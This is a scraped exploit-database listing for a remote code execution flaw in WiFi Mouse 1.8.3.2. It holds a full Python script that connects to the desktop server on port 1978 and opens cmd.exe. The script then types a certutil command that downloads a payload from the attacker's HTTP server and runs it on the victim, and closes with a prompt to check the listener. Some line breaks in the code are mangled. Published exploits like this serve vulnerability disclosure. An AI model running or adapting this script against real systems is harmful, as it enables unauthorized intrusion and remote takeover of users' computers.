Exploit for WiFi Mouse 1.8.3.2 Remote Code Execution

Name: Exploit for WiFi Mouse 1.8.3.2 Remote Code Execution
Rating: 5 (129 reviews)
2023-03-27 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:171499
# Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)  
# Date: 13-10-2022  
# Author: Payal  
# Vendor Homepage: http://necta.us/  
# Software Link: http://wifimouse.necta.us/#download  
# Version: 1.8.3.2  
# Tested on: Windows 10 Pro Build 21H2  
  
# Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.  
#!/usr/bin/env python3  
from socket import socket, AF_INET, SOCK_STREAMfrom time import  
sleepimport sysimport string  
  
target = socket(AF_INET, SOCK_STREAM)  
port = 1978  
try:  
rhost = sys.argv[1]  
lhost = sys.argv[2]  
payload = sys.argv[3]except:  
print("USAGE: python " + sys.argv[0]+ " <target-ip>  
<local-http-server-ip> <payload-name>")  
exit()  
  
  
characters={  
"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",  
"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",  
"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",  
"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",  
"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",  
" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",  
">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",  
"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",  
"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}  
  
def openCMD():  
target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"),  
(rhost,port)) # openfile /C/Windows/System32/cmd.exe  
def SendString(string):  
for char in string:  
target.sendto(bytes.fromhex("7574663820" + characters[char] +  
"0a"),(rhost,port)) # Sends Character hex with packet padding  
sleep(0.03)  
def SendReturn():  
target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) #  
'key 3RTN' - Similar to 'Remote Mouse' mobile app  
sleep(0.5)  
def exploit():  
print("[+] 3..2..1..")  
sleep(2)  
openCMD()  
print("[+] *Super fast hacker typing*")  
sleep(1)  
SendString("certutil.exe -urlcache -f http://" + lhost + "/" +  
payload + " C:\\Windows\\Temp\\" + payload)  
SendReturn()  
print("[+] Retrieving payload")  
sleep(3)  
SendString("C:\\Windows\\Temp\\" + payload)  
SendReturn()  
print("[+] Done! Check Your Listener?")  
  
def main():  
target.connect((rhost,port))  
exploit()  
target.close()  
exit()  
if __name__=="__main__":  
main()